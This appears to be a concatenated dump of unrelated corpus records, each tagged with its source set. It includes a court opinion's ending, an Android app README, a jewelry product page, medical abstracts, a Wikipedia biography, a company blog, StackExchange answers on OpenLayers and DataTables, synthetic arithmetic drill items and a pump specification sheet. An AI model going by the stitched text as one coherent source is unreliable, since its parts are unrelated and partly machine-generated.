required to reimburse appellants. The court pointed out that reading the contract
3
In fact, the district court noted that Sturdivant’s home had not been sold as
of February 2010, approximately two years after his termination.
-13-
as requiring Duckwall to reimburse such expenses would violate the explicit
requirement that the employee be paid “all Earned Obligations in a lump sum
within thirty (30) days after the Termination of Employment.”
We agree with the reasoning of the district court and affirm on those
grounds. The contract requires that all Earned Obligations be paid within thirty
days of termination. This is only possible if such obligations can be determined
within that time. Thus, reading the contracts to require these specific Earned
Obligations to be paid no matter when they are incurred is unworkable.
III
The judgment of the district court is AFFIRMED.
Entered for the Court
Carlos F. Lucero
Circuit Judge
-14-
|
{
"pile_set_name": "FreeLaw"
}
|
一、简介
该款APP是一个后台基于bmob后端云的校园社交APP,后台采用bmob云存储技术。界面采用了谷歌的matrial design设计,框架基于MD+Rxjava+retrofit+MVP架构。
到目前为止,已经完成的功能模块有单聊,群聊,附近人搜索,开心时刻,天气预报,朋友圈发表和个人信息编辑展示等7大功能模块。
首先郑重声明下,该聊天功能的实现并不是调用官方的即时通讯API,而是本人自己结合官方提供的推送功能和实时同步的功能,按照自己的逻辑来实现的,所以内部聊天信息的逻辑处理过程源码是开放的,希望对想学习Android聊天框架的同学有所帮助。
项目详解地址:http://www.jianshu.com/p/2d76430617ae
二、screenshot
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170609-153556.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-153501.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70611-240903.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-160929.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-160840.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-160131.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-160046.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-154410.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-154406.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-154358.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-154355.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-154347.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-154938.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-155450.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-155556.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-161608.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-161817.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-161924.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-162019.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-162025.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-162038.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-235352.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-235657.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170611-104346.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170611-104502.jpg
width=250 height=450>
<image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170611-104528.jpg
width=250 height=450>
|
{
"pile_set_name": "Github"
}
|
Her desire to express faith at such a young age is something to celebrate. Surprise the little girl in your life with this glittering sterling silver cross. Just for her, the design may be engraved with her name, up to eight characters, written in bold block letters. Hung sweetly around her neck, the rope chain is 16.0 inches in length with a spring-ring clasp. This item is only available online.
View product details.
Typographic errors are subject to correction. Merchandise enlarged to show detail and may not always be exactly as pictured. Promotions, prices, styles and availability may vary by store and online.
Child's Name Cross Pendant in Sterling Silver (8 Letters)
3.5
5
2
2
Not what I expected
I have been searching for the perfect engraved cross necklace for my daughter (4). When I saw this necklace I thought it was exactly what I was looking for. When I opened it I was dissappointed of the size and the quality. This is a baby's necklace, not a toddler to young age item.
February 12, 2013
Perfect children's necklace!
My husband bought this necklace for my daughter. who is 4-years-old. Its the prefect size. And she absolutely loved it. It's a great quality. She wears it everywhere, and we have never had any problems with the chain or anything looking tarnished.
September 6, 2012
2015-08-01T16:13:36.857-05:00
bvseo_lps, prod_bvrr, vn_prr_5.6
cp-1, bvpage1
co_hasreviews, tv_2, tr_2
loc_en_US, sid_3612647, prod, sort_default
1-2of2
FREE Shipping
Shipping Information
SPECIAL ORDER ITEM: Normal processing for this item is 2-3 weeks before it ships and it will ship via your chosen ship method after the processing time is complete. Signature required for orders over $100.
Guest Return and Exchange Policy
Your online purchase may be returned to any of our stores or returned by mail to our
distribution center.
Returns and exchanges are permitted within 60 days from the purchase date for jewelry; and within 30 days from the purchase date for watches. Jewelry must be in good condition with all original certificates and accessories. Watches
must be unworn, unaltered and in original condition to be accepted for return or exchange.
|
{
"pile_set_name": "Pile-CC"
}
|
[Lymph node staging and diagnostic imaging--status quo and future prospects].
Exact lymph node staging is crucial to tumor staging and outcome, as well as therapy planning. Due to the low specificity and sensitivity of current imaging methods, invasive, expansive and uncomfortable diagnostic procedures are still widely used, often in conjunction with imaging. This brief overview is intended to summarize current imaging strategies and to give an outlook on new experimental imaging strategies which may play an important role in lymph node staging.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Justin Boyd
Phillip Justin Boyd, known as Justin Boyd (born c. 1975), is an American pharmacist who is a Republican member of the Arkansas House of Representatives for District 77 in a portion of Sebastian County in the western portion of his state.
Boyd is co-owner of Coleman Pharmacy in Alma in Crawford County. He earned his Associate's degree from the University of Arkansas - Fort Smith and received a Master of Business Administration from the Sam M. Walton College of Business at the University of Arkansas at Fayetteville. He earned his Doctor of Pharmacy from the University of Arkansas for Medical Sciences in the capital city of Little Rock.
Boyd and his wife, Lora Ann Hill "Lori" Boyd, who has worked in the field of audiology, have three daughters, Mora, Olivia, and Amelia. He is a member of Rotary International, the National Wild Turkey Federation, and the Arkansas Pharmacists Association, from which he received the "Distinguished Young Pharmacist Award." He previously lived in Van Buren (Crawford County) and Springdale (Washington County), Arkansas, dates unavailable.
Boyd is a Roman Catholic affiliated with St. Boniface Parish in Fort Smith and the chairman of the St. Boniface School Endowment Board.
In 2014, Boyd ran without opposition in both the Republican primary and the general election for the legislative seat vacated by his fellow Republican, Stephanie Malone of Fort Smith, who was term-limited. Boyd is assigned to the House committees on: (1) Public Health, Welfare, and Labor and (2) City, County, and Local Affairs. In February 2015, he joined dozens of his fellow Republicans and two Democrats in co-sponsoring legislation submitted by Representative Lane Jean of Magnolia in Columbia County , to reduce unemployment compensation benefits. The measure was promptly signed into law by Republican Governor Asa Hutchinson.
References
Category:1975 births
Category:American pharmacists
Category:American Roman Catholics
Category:Arkansas Republicans
Category:Businesspeople from Arkansas
Category:Living people
Category:Members of the Arkansas House of Representatives
Category:People from Choctaw County, Oklahoma
Category:People from Crawford County, Arkansas
Category:Politicians from Fort Smith, Arkansas
Category:Sam M. Walton College of Business alumni
Category:School board members in Arkansas
Category:University of Arkansas – Fort Smith alumni
Category:University of Arkansas for Medical Sciences alumni
Category:University of Arkansas alumni
Category:21st-century American politicians
Category:Catholics from Oklahoma
Category:Catholics from Arkansas
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Archive for June, 2016
Nothing says summer like ice cream. For Wilmington, Ohio, nothing says summer like the Banana Split Festival. Every second weekend in June, Wilmington plays host to the Banana Split Festival at the JW Williams Park. R+L Carriers has been a sponsor in previous years, but this year was the first time the R+L Carriers Hometown Showcase participated.
History of the Banana Split Festival
The Banana Split can be traced back to Wilmington, Ohio in the early 1900s. Ernest Hazard owned a restaurant in the city called Hazard’s. In an effort to attract Wilmington College students to his restaurant, he decided to create a new and unique dish. On a winter night in 1907, he offered up all his ingredients to his employees to come up with the most creative dish.
The winning dish, a peeled banana with three scoops of ice cream complete with all the fixings you could imagine. To top it off, whipped cream and two cherries on top! Ernest’s brother, Clifton would eventually coin the term Banana Split. According to Pennsylvania, they coined the term Banana Split a few years prior, but Wilmington, Ohio is having no part in that debate.
2016 Banana Split Festival
This year, the Banana Split Festival took place on June 10-11 at the JW Williams Park. The R+L Carriers Hometown Showcase showed support for our very own community by providing fun and games during the festival. It was also an opportunity to showcase our career opportunities. At our headquarters in Wilmington, Ohio we have over 25 positions available and over 250 nationwide.
As with most events, our Cornhole Challenge was a hit. Those attending the festival could also take our scavenger hunt, which is designed to take people around the interactive hauler to find answers to questions related to R+L Carriers and the logistics industry. At the end of the scavenger hunt, there is a short survey to fill out and then guest receive an official Hometown Showcase t-shirt.
The next stop for the Hometown Showcase will be back in Wilmington, Ohio for the Clinton County Fair, July 11-16. Are you interested in having the Hometown Showcase in your community for you next event? Check our online calendar and contact us today!
The R+L Carriers Hometown Showcase continued its mission of “Delivering Opportunities to Students Across America”® over the weekend. Our 53 foot interactive trailer was on site at Jesse Owens Memorial Stadium in Columbus, Ohio for the 2016 Ohio High School Athletic Association (OHSAA) Track & Field Championships.
Track & Field Championships
Athletes from around Ohio took to the track & field championships to compete. Four divisions competed; Division I, II, III and Seated Division. The Seated Division was added in 2012, when the OHSAA made the historic decision to approve eight wheelchair championship events.
Hometown Showcase Activities
The heat was turned up outside and on the track. Rain delayed action for awhile on Saturday, but not for long. A few coaches from participating schools received an official Hometown Showcase water cooler. With the heat, they were very appreciative. Of course, our team was on hand to provide fun as well. Our Cornhole Challenge continues to be a big hit! Contestants who make the first bag in the hole receive a stadium seat. If you make the 2nd, 3rd, or 4th bag into the hole you receive a t-shirt or an official Hometown Showcase travel blanket.
A few coaches from participating schools received an official Hometown Showcase water cooler. Pictured here (L-R) is a coach from Miami Trace, Dane Gordon and Daniel Carroll.
Those in attendance were also able to tour our trailer to learn more about the logistics industry and the various careers in which it offers. Our Hometown Scavenger Hunt is designed to help people learn more about logistics and R+L Carriers. By completing the Scavenger Hunt and taking a short career survey fans received a free Hometown Showcase t-shirt.
The next stop for the Hometown Showcase is the Banana Split Festival in Wilmington, Ohio. If you are interested in having the Hometown Showcase provide opportunities to your school or community, check our schedule online and contact us today for additional information!
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Reloading OpenLayers 5 WMS automatically with new data
I am making a weather application. It is almost finished now, but I just have one problem left. I want a WMS-layer to automatically reload every few seconds. I thought I had the solution, but it seems that it doens't quite work. Below (some of) my code.
It seems to redraw the WMS, but not with changed data. Only when the datetime or weathertype CHANGES, then the WMS-gets new data and that is shown on the map. But I want it to keep reloading and show the new data for that datetime. (Because the datetime only changes once in a while, but the data keeps rolling in.)
I hope I made my question clear.
I searched and found some solutions, but they didn't work for me. Besides most solutions I found were for OL2 or OL3 and I am working with OL5.
Please help me.
A:
Adding a dummy parameter (if the name isn't recognised by the server it should ignore it) to the WMS set to the current datetime in milliseconds should force a reload and override browser caching. You could use a javasript setInterval if necessary to update it, e.g. 'TIMESTAMP': new Date().getTime()
|
{
"pile_set_name": "StackExchange"
}
|
- (-1 + 9).
-4
What is the value of 84 + -102 + -2 + 26?
6
What is (4 + -7 + 9 - 1) + -4 - 12?
-11
What is -3 + 1 + -2 - (-26 - -15 - -2)?
5
-1 + 1 + 24 - 14
10
6 + 0 + (0 + 6 - 24)
-12
Evaluate -5 + 9 + (-1 + 16 - 16).
3
Evaluate (-1 - 6) + 43 + -33.
3
What is -8 - 1 - (24 - 13 - 35)?
15
Calculate 1 + (-3 + 1 - 5).
-6
-8 + (-18 - (-11 + (-1 - -7)))
-21
Evaluate 5 + 4 + (7 - (9 + 16)).
-9
Evaluate 7 + 2 + (-29 - -30 - (-1 + 10)).
1
What is -8 - ((-72 - -76) + (0 - 1))?
-11
Evaluate 12 + -1 + 5 + (6 - 3) - 3.
16
-16 - -2 - (11 + -27)
2
What is the value of (30 - -34) + -29 - 19?
16
What is the value of -5 + 1 + (-13 - (18 + -29))?
-6
What is the value of -18 - (-4 - (60 + -54 + (1 - 14)))?
-21
What is the value of -5 - 0 - (-2 - (0 - 3)) - -3?
-3
Calculate (13 + -10 - (-5 - -2)) + (-12 - 2).
-8
2 + -8 + (106 - 110) + (-6 - 0)
-16
Calculate (-6 - (-17 + 14)) + 14.
11
Evaluate (3 - (1 - 0 - -4)) + 7 + -9.
-4
Calculate (4 - 24) + 63 + -28.
15
Calculate 31 + 4 + -28 + 15.
22
(-1 - 1) + -8 + (23 - 16)
-3
4 + 1 + -1 + -2 + -6 + -8
-12
What is -5 + 11 + (0 - -9) + -38?
-23
-29 + 18 + -1 + 21
9
What is (-23 - -46 - 18) + -1 + 0 + -17?
-13
(8 - 18 - 20) + 34
4
Calculate 18 + 3 - 18 - (35 + 2 + -9).
-25
Evaluate (4 - (17 + -17 - -3)) + -15.
-14
2 - -11 - (-10 - -6)
17
Calculate 13 + -32 + 21 - -13.
15
What is the value of (15 - (19 + 13)) + 11?
-6
8 + 0 + (-10 - -8) + 7
13
Evaluate 1 + -9 + (6 - (30 - 15)).
-17
What is the value of (-12 + 13 - 9) + 6?
-2
Evaluate (-5 + 2 - 2 - (-35 - -34)) + 4.
0
Calculate (14 - 0) + 80 + -88.
6
What is the value of 0 - (-4 + 23 + (1 - (-3 - -10)))?
-13
Evaluate (56 - 33) + -40 - -28.
11
14 - (-2 + 18 + -8)
6
What is 28 - -1 - 47 - (-12 - -2)?
-8
15 + 2 + -2 + 11 + -20
6
Calculate -17 - (8 + (-37 - (9 - 4))).
17
Evaluate -14 + (-21 - -32) + (9 - -1).
7
Calculate -6 + -3 + 11 + -4 - (14 - 21).
5
What is the value of (13 - -3) + (36 - 66)?
-14
What is 6 + -1614 + 1618 + (0 - (1 + 1))?
8
Evaluate -14 - (20 + (-12 + -2 - -13)).
-33
Evaluate (-2 - -7) + (1 + -2 - 7) + 1.
-2
Calculate 2 - (-8 - (4 + -31 + 14)).
-3
What is (-3 - ((14 - (-8 + 14)) + -10)) + 6?
5
-7 + -2 + 11 - 7 - 0 - 19
-24
Evaluate 10 + 41 - (21 + -6) - 9.
27
What is (10 + -3 + 1 - 8) + -15?
-15
Calculate (16 + -29 + 18 - (0 - -2)) + -7.
-4
Evaluate -16 - (0 - (-1 + -3)).
-20
(8 - (5 - 5 - -9)) + 6
5
Evaluate -11 + -3 + -2 + 2 - (42 + -49).
-7
Calculate 5 + (-5 - 6) + -5.
-11
What is 19 + (64 - 17) + -17 - (-2 - -14)?
37
What is the value of 0 + -4 + 9 + (-9 - 4) + -4?
-12
What is 1 + (31 - 84) + 26?
-26
Evaluate 30 - (28 + -10 - -1).
11
Calculate 3 + -17 + (-3 - (13 + -5)).
-25
Calculate 37 + (-16 + 2 - (-132 + 133)).
22
Evaluate -6 - (-1 + 6 - -3) - (1 - 7).
-8
What is 16 + (-11 - (-3 - 5)) + 6?
19
What is -80 + 43 - -28 - (-1 + 0 - -3)?
-11
Calculate (22 - 13) + -13 + 5.
1
Calculate -6 + (11 - ((-6 - -1) + 3)).
7
35 - (-24 + 53) - (2 + -1 + 8)
-3
Calculate 0 - -14 - 40 - -15.
-11
7 + (17 - 17) + -10 - -14
11
Evaluate 9 + -15 + (-16 - -1).
-21
1 - (-2 + 10 - (-4 + 10))
-1
What is 4 + -3 + (5 - (10 - 5))?
1
What is (19 - (-22 + 41)) + -12 + 0?
-12
What is -3 - (-18 - -2 - (-1 - -5 - -1))?
18
Evaluate -7 + (-1 + -6 + 7 + -15 - -6).
-16
Evaluate -14 - ((-25 - (11 - -1)) + 15).
8
Calculate -1 + 9 + (479 - 490).
-3
What is the value of 5 - (-57 + 51 + (19 - (2 + 0)))?
-6
188 + -197 + 4 + -22 + (-3 - -7)
-23
Evaluate (0 - (-6 - 9)) + (-2 - (-2 - 0)).
15
What is (2 - 10) + 40 + -29?
3
Calculate (-6 - -12) + (-6 - -6) + -5 + -4.
-3
What is the value of 2 + (-3 + 1 - 0 - -4 - 13)?
-9
Evaluate (-3 - -1) + (-6 - -14) - 13 - -4.
-3
What is 1 + -40 - -35 - -38?
34
What is the value of 26 - (12 + 17 + -9)?
6
-7 + 25 + -1 - 21
-4
Evaluate (10 - 18) + 44 + -1 + -12.
23
What is the value of 7 - 7 - (0 + 3 + -5)?
2
What is the value of 29 + -7 + -36 - 5?
-19
Evaluate -31 - (23 - 89 - -29).
6
Evaluate -7 + 16 + -5 + -3.
1
What is (21 - 25) + 7 + -3 + 34?
34
What is the value of (-4 - 10 - -5) + 0?
-9
What is the value of (-1 - -1) + 5 + -5 - (499 + -491)?
-8
Calculate 17 - (16 - (13 - 8)).
6
What is -17 - (-34 + 0) - 22?
-5
(-4 - -2 - 5) + 2
-5
Calculate 20 - (4 - -8 - -8).
0
5 + 6 + -15 + 6 + 4
6
What is the value of (0 - 2) + (0 - 0) + -12 + 4?
-10
Calculate 1 - -18 - (-16 + 34 + -14).
15
Calculate (-47 - (36 + -71)) + (-12 - 0).
-24
What is the value of -11 + (-9 + 10 - -3) - -27?
20
Calculate (5 - 11) + 34 - 13 - -16.
31
Calculate 2 - (29 - (17 - -8)).
-2
Evaluate -3 - (17 - (-9 - -4)).
-25
(-5 - -4) + 0 + -17 + -4 + 10
-12
Calculate -1979 + 1982 - ((0 - (-2 - 0)) + 8).
-7
What is 21 - (8 - 12 - -33)?
-8
22 + -13 + (-32 - (3 + -7))
-19
What is the value of 9 - (-26 + 1 + 36)?
-2
What is 6 - (0 + (-8 - -21) + -12)?
5
What is the value of -7 + (8 - (6 + -6)) - -2?
3
Calculate -4 + (26 - 10) + (-2 - (-3 + -1)).
14
Evaluate 25 + (-37 - 12) - -17.
-7
What is -44 + (16 - -3) + 12?
-13
What is the value of 11 + -1 - (11 + (-1 - -6))?
-6
What is the value of (-8 - 0) + -1 + 3 - (119 + -138)?
13
What is the value of 2 + (1 - 3) + -5 + 80 + -56?
19
Evaluate -16 + -21 + 23 + 21.
7
-75 + 59 + 1 + 34
19
What is the value of 27 + (-13 - 1) + -23?
-10
Calculate 23 + -5 + 13 + -18 - 36.
-23
-5 + -5 + 8 + (-13 - -6)
-9
What is -10 - (12 - (-10 - -23))?
-9
Calculate -1 + -2 + -9 + -55 + 57.
-10
0 - 5 - (-18 + 7 + 6 + 0)
0
What is the value of 20 + 11 + -6 + -16?
9
What is the value of (-16 - (-18 + 1)) + 2?
3
What is (3 + -21 + 8 - -47) + -1 + 0?
36
What is 3 + -23 + 26 - (-8 - -1)?
13
(28 - 8) + -23 + -1 + 9
5
What is -25 - -40 - 13 - (6 + (3 - 1))?
-6
What is the value of -13 - -15 - (-3 - (3 + 2 + -1))?
9
Calculate 62 - (1 - (-54 + 24)).
31
Calculate 7 + (14 - 12 - (-4 - -2)).
11
What is the value of -5 - 13 - (-35 + 26)?
-9
Evaluate -1 - -9 - (381 + -375).
2
What is -23 - -17 - (-5 + 2 + -2)?
-1
What is the value of (19 - 9) + 2 + -26 + 5?
-9
What is the value of -12 - (-3 - -9 - 6) - (-4 - -4)?
-12
Evaluate (-5 - -8) + 1 + 1 + -7.
-2
Calculate 12 - (-18 - (-46 + -3)).
-19
What is -34 + (-27 - -103) - 12?
30
Calculate -11 + 0 + (4 - (8 + (0 - 4))).
-11
Evaluate (-8 + 3 - -8) + 23 + -8 + 0.
18
What is -12 - (15 - 6 - 17)?
-4
What is the value of 0 + -3 - (-18 + 28 + -17)?
4
-22 + 6 + 15 + 0 + -6 + -4
-11
What is the value of 6 + 0 + -10 + 4 + -4?
-4
(3 + -15 + -1 - -44) + -16
15
Evaluate -55 + -30 + 54 + 7.
-24
Calculate 0 - -6 - (7 + 4 - 19).
14
What is the value of 0 + 0 - 1 - ((8 - 8) + 3)?
-4
What is the value of -37 - ((-2 - -37) + -40)?
-32
Calculate -9 - -45 - 37 - (17 + 3).
-21
What is 10 - ((-6 - -16 - 22) + 33)?
-11
Calculate -5 + (-2 - (-5 - -5 - (3 + -2))).
-6
What is the value of 0 - (0 - (-4 - -7 - -2))?
5
Calculate -117 - -116 - (0 - -14).
-15
What is 20 + -2 - (1 + 8 + 2 - 2)?
9
What is -2 + -8 - -15 - -7?
12
Evaluate 2 - (-15 + 9) - (-4 + (-2 - -2)).
12
What is 2 - ((-11 + -6 - -8) + 6)?
5
Evaluate (-14 - -2) + -6 + 15.
-3
What is 22 + 19 + -29 + 4?
16
532 - 543 - (-1 + (-6 - -1))
-5
(-8 - ((-2 - -1) + -1)) + -180 + 199
13
-6 + 5 + -13 + 16 - (-1 + -1)
4
16 + -8 - (1 + -1 + 0 - 0)
8
(4 - 8) + -6 + 6 + 15
11
What is 11 + -34 + (-7 - -2) + 7 + -10?
-31
Evaluate 4 + -27 + 4 - (-11 + 1).
-9
Calculate 22 + (-4 - 2 - -1) - 2.
15
What is -1656 + 1644 - (27 + 0)?
-39
Evaluate (7 + (-6 - 0) - 4) + 1.
-2
11 - 5 - ((-3 - -12) + -6)
3
4 + 1 - (3 + (8 - (4 - -7)))
5
Calculate -11 - (1 + -10 - ((15 - 8) + -11)).
-6
What is the value of 20 - 23 - (-2 - -1)?
-2
What is the value of -6 + (7 + -10 - 4)?
-13
Evaluate -6 - -8 - (-4 + 4) - (-13 - 2).
17
What is the value of 3 + -7 + -2 + 0 + (11 - 1)?
4
Evaluate 3 - 2 - (-1 - 9 - -4) - 18.
-11
What is the value of (-11 - -1) + -185 + 188 + 6?
-1
What is (-4 - -10) + -15 + 5 - (12 + -25)?
9
(-12 + 14 - -8) + 13 + -13
10
Evaluate (-9 - -3 - (-3 - -27)) + -39 + 35.
-34
What is the value of -23 - ((15 - 11) + -2 - 2)?
-23
What is the value of 5 + -1 + 0 + -2 + (2 - 2)?
2
Evaluate 1 + 5 + (-8 - (-14 + 11 + -1)).
2
What is 27 - (5 + 2 - 3) - (-22 + 23)?
22
What is (2 - -8 - -11) + (-20 - (-24 - -12))?
13
35 - (-6 + -8 - -13 - -4)
32
Calculate -18 - (-23 + 12 - -11).
-18
4 - 1 - 0 - (20 - (20 + -17))
-14
What is the value of 28 - (-16 - (-79 - -32))?
-3
Calculate -2 - (-18 - (4 + -4) - (-28 + 22)).
10
What is the value of -8 - -15 - (4 - (-3
|
{
"pile_set_name": "DM Mathematics"
}
|
Q:
How to get Row data after a button click in datatables
can anyone help me on how to get a single row data on a click event.
This is the table which is dynamically populated after Success function in AJAX call is executed
<div class="table-responsive table-wrap tableFixHead container-fluid">
<table class="table bg-violet dT-contain" id="datatable" >
<thead class="thead-dark">
<tr>
<th>No.</th>
<th>Main</th>
<th>Shrinked</th>
<th>Clicks</th>
<th>Disable</th>
<th>Delete</th>
</tr>
</thead>
<tbody>
<tr class="bg-violet">
</tr>
</tbody>
</table>
</div>
<script src="scripts/jquery-3.5.1.min.js"></script>
<script src="scripts/jquery.dataTables.min.js"></script>
<script src="scripts/dataTables.bootstrap4.min.js" defer></script>
<script src="scripts/dashboard.js" defer></script>
This is my ajax success function
success: function(data){
$('#datatable').dataTable({
data: data,
"autoWidth": true,
columns: [
{'data': 'id'},
{'data': 'main'},
{'data': 'shrinked'},
{'data': 'clicks'},
{"defaultContent": "<button id='del-btn'>Delete</button>"}
]
})
}
I am adding a delete button to each row dynamically, but can't seem to fetch row data using it.
I tried this method with some tweaks to my success function
$('#datatable tbody').on( 'click', 'button', function () {
var data = table.row( $(this).parents('tr') ).data();
alert( data[0] );
} );
But this didn't seem to work.
The JSON data returning from the AJAX call is in this format:
[{"id":"12","main":"ndkekfnq" ...}, {.....}]
I also added an onclick function on the delete button to try to fetch data but that also didn't work.
EDIT: whole AJAX request
$(document).ready(()=>{
$.ajax({
url: 'URL',
method: 'post',
dataType: 'json',
data: {
"email": window.email,
"token": window.token
},
success: function(data){
let table = $('#datatable').dataTable({
data: data,
"autoWidth": true,
columns: [
{'data': 'id'},
{'data': 'main'},
{'data': 'shrinked'},
{'data': 'clicks'},
{"defaultContent": "<button id='dis-btn' class='btn btn-warning'>Disable</button>"},
{"defaultContent": "<button id='del-btn' class='btn btn-danger'>Delete</button>"}
]
})
$('#datatable tbody').on('click', "#del-btn", function() {
let row = $(this).parents('tr')[0];
//for row data
console.log(table.row(row).data().id);
});
}
})
})
What would be the correct way to do this? Thank you
A:
You need to use column.render instead o defaultContent and then get the data on an outside function, you need to render a button at the render of the table:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Document</title>
<link
rel="stylesheet"
href="https://cdn.datatables.net/1.10.21/css/jquery.dataTables.min.css"
/>
<script src="https://code.jquery.com/jquery-3.5.1.js"></script>
<script src="https://cdn.datatables.net/1.10.21/js/jquery.dataTables.min.js"></script>
</head>
<body>
<div class="table-responsive table-wrap tableFixHead container-fluid">
<table class="table bg-violet dT-contain" id="datatable" >
<thead class="thead-dark">
<tr>
<th>No.</th>
<th>Main</th>
<th>Shrinked</th>
<th>Clicks</th>
<th>Delete</th>
</tr>
</thead>
<tbody>
<tr class="bg-violet">
</tr>
</tbody>
</table>
<script>
$('#datatable').dataTable( {
"data": [{'id':20,'main':'hola','shrinked':false,'clicks':2000},{'id':21,'main':'hola','shrinked':false,'clicks':283000}],
"autoWidth": true,
"columns": [
{"data": "id"},
{'data': 'main'},
{'data': 'shrinked'},
{'data': 'clicks'},
{"data": "id",
"render": function ( data, type, row, meta ) {
return '<button data-id="'+data+'" onclick="deleteThis(event)">Delete</button>'
}
}
]
} )
function deleteThis(e){
console.log(e.target.getAttribute('data-id'))
}
</script>
</body>
</html>
Haven't tried, but based on Datatables docs, this should work, let me know if it worked.
|
{
"pile_set_name": "StackExchange"
}
|
Primary measures of dependence among menthol compared to non-menthol cigarette smokers in the United States.
Previously published studies provide somewhat inconsistent evidence on whether menthol in cigarettes is associated with increased dependence. The National Health and Nutrition Examination Survey, National Survey on Drug Use and Health, National Health Interview Survey, and Tobacco Use Supplement to the Current Population Survey collect data on current cigarette type preference and primary measures of dependence, and thus allow examination of whether menthol smokers are more dependent than non-menthol smokers. Analyses based on combined data from multiple administrations of each of these four nationally representative surveys, using three definitions for current smokers (i.e., smoked ⩾1day, ⩾10days and daily during the past month), consistently demonstrate that menthol smokers do not report smoking more cigarettes per day than non-menthol smokers. Moreover, two of the three surveys that provide data on time to first cigarette after waking indicate no difference in urgency to smoke among menthol compared to non-menthol smokers, while the third suggests menthol smokers may experience a greater urgency to smoke; estimates from all three surveys indicate that menthol versus non-menthol smokers do not report a higher Heaviness of Smoking Index. Collectively, these findings indicate no difference in dependence among U.S. smokers who use menthol compared to non-menthol cigarettes.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
The present invention relates to the field beverages or other liquid comestibles (soups, of producing etc.) on the basis of ingredients which are contained in a capsule.
The capsule is inserted into the beverage production module of a beverage production machine (coffee machine, etc.). The module is designed to inject a liquid such as for example hot water under pressure into the capsule in order to have the liquid interact with the ingredients contained in the capsule.
Note that some beverage production techniques ask for a pressurized injection, others such as e.g. brewing tea can be made at ambient pressure. The invention can find application in both scenarios.
The result of the interaction, i.e. the produced beverage or liquid comestible is then drained from the capsule and fed to a receptacle such as e.g. a coffee cup placed below an outlet for the beverage.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Beth Ditto Graces The Cover of Elle UK’s November 2017 Issue
The singer/songwriter is one of Elle’s cover girls for their inaugural Wonder Women issue.
And we couldn’t be happier.
Beth Ditto represents someone who is fearless, authentically herself and proud to be who she is, as a plus size queer woman breaking rules and proving that size or sexuality doesn’t dictate success or brilliance.
The inaugural ELLE Wonder Women issue is all about celebrating inspiring and diverse women like Ditto. The other three cover models featured in this amazing issue are plus size model Ashley Graham, actress and activist Susan Sarandon and model/designer Alek Wek.
In Ditto’s case, she’s interviewed by rock icon Debbie Harry, where they talked about everything from religion to fashion, and how much to drink before going on stage. The recording of their interview will be shared online soon.
|
{
"pile_set_name": "Pile-CC"
}
|
HORSEPOWER SPECIFICATIONS
Horsepower Requirements
The ratings shown are the power requirements for the pump. Gas engine power outputs must be approximately twice the pump power requirements shown above.
We recommend a 1.15 service factor be specified when selecting an electric motor as the power source. To compute specific pump horsepower requirements use the following formulas:
Electric HP = (GPM X PSI)/1450
as HP = (GPM X PSI)/1100
*Engine power varies based on horizontal or vertical orientation, as well as by makes and models from each manufacturer.
REPAIR KITS
ITEM#
PART#
DESCRIPTION
Qty.
Plunger Packing Kit – Part #09737
33A
08087
Grooved Ring
3
36
06359A
Pressure Ring
3
36A
04117
Guide Ring
3
36B
05263
Support Ring
3
37
06360
Sleeve
6
38
13422
Sleeve Support Ring
3
39
13424
Leakage Seal
3
Valve Assembly Kit – Part #09738
40
07214
O-Ring
9
44A
06362
Tension Spring
6
44B
07283
Valve Spring
6
44C
06363
Valve Plate
6
44D
06364
Valve Seat
6
44E
07035
O-Ring
6
Oil Seal Kit – Part #09577
31
07133
Oil Seal
3
Repair Kits Available
